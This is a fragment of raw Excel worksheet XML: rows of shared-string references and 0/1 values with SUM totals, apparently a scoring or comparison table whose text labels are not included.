      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>25</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="1" t="s">
        <v>8</v>
      </c>
      <c r="B5" t="s">
        <v>26</v>
      </c>
      <c r="C5" t="s">
        <v>26</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" t="s">
        <v>26</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B6" t="s">
        <v>27</v>
      </c>
      <c r="C6" t="s">
        <v>27</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" t="s">
        <v>27</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="1" t="s">
        <v>10</v>
      </c>
      <c r="B7" t="s">
        <v>28</v>
      </c>
      <c r="C7" t="s">
        <v>28</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" t="s">
        <v>28</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B8" s="5" t="s">
        <v>32</v>
      </c>
      <c r="C8" s="5" t="s">
        <v>32</v>
      </c>
      <c r="F8" s="5" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="39.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B9" t="s">
        <v>29</v>
      </c>
      <c r="C9" t="s">
        <v>31</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" t="s">
        <v>31</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A10" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B10" t="s">
        <v>33</v>
      </c>
      <c r="C10" t="s">
        <v>76</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" t="s">
        <v>34</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B11" t="s">
        <v>35</v>
      </c>
      <c r="C11" t="s">
        <v>35</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" t="s">
        <v>35</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B12" t="s">
        <v>36</v>
      </c>
      <c r="C12" t="s">
        <v>38</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>0</v>
      </c>
      <c r="F12" t="s">
        <v>36</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="39.6" x14ac:dyDescent="0.25">
      <c r="A13" s="1" t="s">
        <v>16</v>
      </c>
      <c r="B13" t="s">
        <v>39</v>
      </c>
      <c r="C13" t="s">
        <v>39</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" t="s">
        <v>39</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B14" t="s">
        <v>40</v>
      </c>
      <c r="C14" t="s">
        <v>40</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" t="s">
        <v>40</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="52.8" x14ac:dyDescent="0.25">
      <c r="A15" s="2" t="s">
        <v>18</v>
      </c>
      <c r="B15" t="s">
        <v>42</v>
      </c>
      <c r="C15" t="s">
        <v>43</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" t="s">
        <v>42</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A16" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B16" s="5" t="s">
        <v>32</v>
      </c>
      <c r="C16" s="5" t="s">
        <v>32</v>
      </c>
      <c r="F16" s="5" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="17" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A17" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B17" s="5" t="s">
        <v>32</v>
      </c>
      <c r="C17" s="5" t="s">
        <v>32</v>
      </c>
      <c r="F17" s="5" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="26.4" x14ac:dyDescent="0.25">
      <c r="A18" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B18" s="5" t="s">
        <v>32</v>
      </c>
      <c r="C18" s="5" t="s">
        <v>32</v>
      </c>
      <c r="F18" s="5" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A19" s="6" t="s">
        <v>41</v>
      </c>
      <c r="B19" s="6"/>
      <c r="C19" s="6"/>
      <c r="D19" s="6">
        <f>SUM(D4:D18)</f>
        <v>11</v>
      </c>
      <c r="E19" s="6">
        <f>SUM(E4:E18)</f>
        <v>9</v>
      </c>
      <c r="F19" s="6"/>
      <c r="G19" s="6">
        <f>SUM(G4:G18)</f>
        <v>11</v>
      </c>
      <c r="H19" s="6">
        <f>SUM(H4:H18)</f>
        <v>10</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A22" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B22" s="25"/>
      <c r="C22" s="25"/>
      <c r="D22" s="25"/>
      <c r="E22" s="25"/>
      <c r="F22" s="25"/>
      <c r="G22" s="25"/>
      <c r="H22" s="25"/>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B23" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E23" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F23" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G23" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H23" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="7" t="s">
        <v>45</v>
      </c>
      <c r="B24" t="s">
        <v>56</v>
      </c>
      <c r="C24" t="s">
        <v>56</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" t="s">
        <v>56</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="7" t="s">
        <v>46</v>
      </c>
      <c r="B25" t="s">
        <v>57</v>
      </c>
      <c r="C25" t="s">
        <v>57</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" t="s">
        <v>57</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="13.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A26" s="23" t="s">
        <v>47</v>
      </c>
      <c r="B26" t="s">
        <v>59</v>
      </c>
      <c r="C26" t="s">
        <v>59</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" t="s">
        <v>59</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A27" s="24"/>
      <c r="B27" t="s">
        <v>58</v>
      </c>
      <c r="C27" t="s">
        <v>58</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" t="s">
        <v>58</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A28" s="23" t="s">
        <v>48</v>
      </c>
      <c r="B28" t="s">
        <v>61</v>
      </c>
      <c r="C28" t="s">
        <v>61</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" t="s">
        <v>61</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="24"/>
      <c r="B29" t="s">
        <v>62</v>
      </c>
      <c r="C29" t="s">
        <v>62</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" t="s">
        <v>62</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A30" s="26" t="s">
        <v>49</v>
      </c>
      <c r="B30" t="s">
        <v>63</v>
      </c>
      <c r="C30" t="s">
        <v>63</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" t="s">
        <v>63</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A31" s="24"/>
      <c r="B31" t="s">
        <v>64</v>
      </c>
      <c r="C31" s="20" t="s">
        <v>64</v>
      </c>
      <c r="D31">
        <v>1</v>
      </c>
      <c r="E31">
        <v>1</v>
      </c>
      <c r="F31" t="s">
        <v>64</v>
      </c>
      <c r="G31">
        <v>1</v>
      </c>
      <c r="H31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="7" t="s">
        <v>50</v>
      </c>
      <c r="B32" t="s">
        <v>65</v>
      </c>
      <c r="C32" t="s">
        <v>65</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" t="s">
        <v>65</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="23" t="s">
        <v>51</v>
      </c>
      <c r="B33" t="s">
        <v>66</v>
      </c>
      <c r="C33" t="s">
        <v>66</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" t="s">
        <v>66</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="24"/>
      <c r="B34" t="s">
        <v>67</v>
      </c>
      <c r="C34" t="s">
        <v>67</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" t="s">
        <v>67</v>
      </c>
      <c r="G34">
        <v>1</v>
      </c>
      <c r="H34">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="7" t="s">
        <v>52</v>
      </c>
      <c r="B35" t="s">
        <v>68</v>
      </c>
      <c r="C35" t="s">
        <v>68</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" t="s">
        <v>68</v>
      </c>
      <c r="G35">
        <v>1</v>
      </c>
      <c r="H35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="23" t="s">
        <v>53</v>
      </c>
      <c r="B36" t="s">
        <v>69</v>
      </c>
      <c r="C36" s="20" t="s">
        <v>69</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" t="s">
        <v>69</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="25.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A37" s="24"/>
      <c r="B37" t="s">
        <v>70</v>
      </c>
      <c r="C37" s="20" t="s">
        <v>70</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" t="s">
        <v>70</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A38" s="23" t="s">
        <v>54</v>
      </c>
      <c r="B38" t="s">
        <v>72</v>
      </c>
      <c r="C38" t="s">
        <v>72</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" t="s">
        <v>72</v>
      </c>
      <c r="G38">
        <v>1</v>
      </c>
      <c r="H38">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="24"/>
      <c r="B39" t="s">
        <v>73</v>
      </c>
      <c r="C39" t="s">
        <v>75</v>
      </c>
      <c r="D39">
        <v>0</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" t="s">
        <v>74</v>
      </c>
      <c r="G39">
        <v>0</v>
      </c>
      <c r="H39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A40" s="7" t="s">
        <v>55</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>77</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1894</v>
      </c>
      <c r="D40" s="3">
        <v>0</v>
      </c>
      <c r="E40" s="3">
        <v>0</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1894</v>
      </c>
      <c r="G40">
        <v>0</v>
      </c>
      <c r="H40" s="3">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A41" s="6" t="s">
        <v>41</v>
      </c>
      <c r="B41" s="6"/>
      <c r="C41" s="6"/>
      <c r="D41" s="6">
        <f>SUM(D24:D40)</f>
        <v>15</v>
      </c>
      <c r="E41" s="6">
        <f>SUM(E24:E40)</f>
        <v>15</v>
      </c>
      <c r="F41" s="6"/>
      <c r="G41" s="6">
        <f>SUM(G24:G40)</f>
        <v>15</v>
      </c>
      <c r="H41" s="6">
        <f>SUM(H24:H40)</f>
        <v>15</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A33:A34"/>
    <mergeCell ref="A36:A37"/>
    <mergeCell ref="A38:A39"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A22:H22"/>
    <mergeCell ref="A26:A27"/>
    <mergeCell ref="A28:A29"/>
    <mergeCell ref="A30:A31"/>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F3C6C-7F99-409D-8B69-FE41E2B9D677}">
  <dimension ref="A1:H44"/>
  <sheetViews>
    <sheetView topLeftCell="A35" workbookViewId="0">
      <selection activeCell="I40" sqref="I40"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="2" width="26.6640625" customWidth="1"/>
    <col min="3" max="3" width="26.88671875" customWidth="1"/>
    <col min="4" max="4" width="10.6640625" customWidth="1"/>
    <col min="5" max="5" width="10.5546875" customWidth="1"/>
    <col min="6" max="6" width="26.5546875" customWidth="1"/>
    <col min="7" max="7" width="10.33203125" customWidth="1"/>
    <col min="8" max="8" width="10.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="32.4" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>322</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ht="82.8" x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>323</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>324</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>346</v>
      </c>
      <c r="D4">
        <v>0</v>
      </c>
      <c r="E4">
        <v>0</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>324</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>325</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>326</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>347</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>326</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>327</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>328</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>348</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>328</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>329</v>
      </c>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="F7" s="3"/>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>330</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>331</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>332</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>333</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>349</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>0</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>354</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>335</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>336</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>350</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>338</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>339</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>351</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>339</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>0</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G14">
        <v>0</v>
      </c>
      <c r="H14">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>334</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>37</v>
      </c>
      <c r="D15">
        <v>0</v>
      </c>
      <c r="E15">
        <v>0</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>36</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>340</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>341</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>337</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>342</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>343</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>343</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>343</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>344</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>345</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>353</v>
      </c>
      <c r="D19">
        <v>0</v>
      </c>
      <c r="E19">
        <v>0</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>355</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A20" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D20" s="6">
        <f>SUM(D4:D19)</f>
        <v>12</v>
      </c>
      <c r="E20" s="6">
        <f t="shared" ref="E20:H20" si="0">SUM(E4:E19)</f>
        <v>10</v>
      </c>
      <c r="F20" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G20" s="6">
        <f t="shared" si="0"/>
        <v>14</v>
      </c>
      <c r="H20" s="6">
        <f t="shared" si="0"/>
        <v>12</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A23" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B23" s="25"/>
      <c r="C23" s="25"/>
      <c r="D23" s="25"/>
      <c r="E23" s="25"/>
      <c r="F23" s="25"/>
      <c r="G23" s="25"/>
      <c r="H23" s="25"/>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B24" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E24" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F24" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G24" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H24" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A27" s="3"/>
      <c r="B27" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D27" s="19">
        <v>1</v>
      </c>
      <c r="E27" s="19">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G27" s="19">
        <v>1</v>
      </c>
      <c r="H27" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>1381</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>1404</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>1404</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1404</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>1343</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" x14ac:dyDescent="0.25">
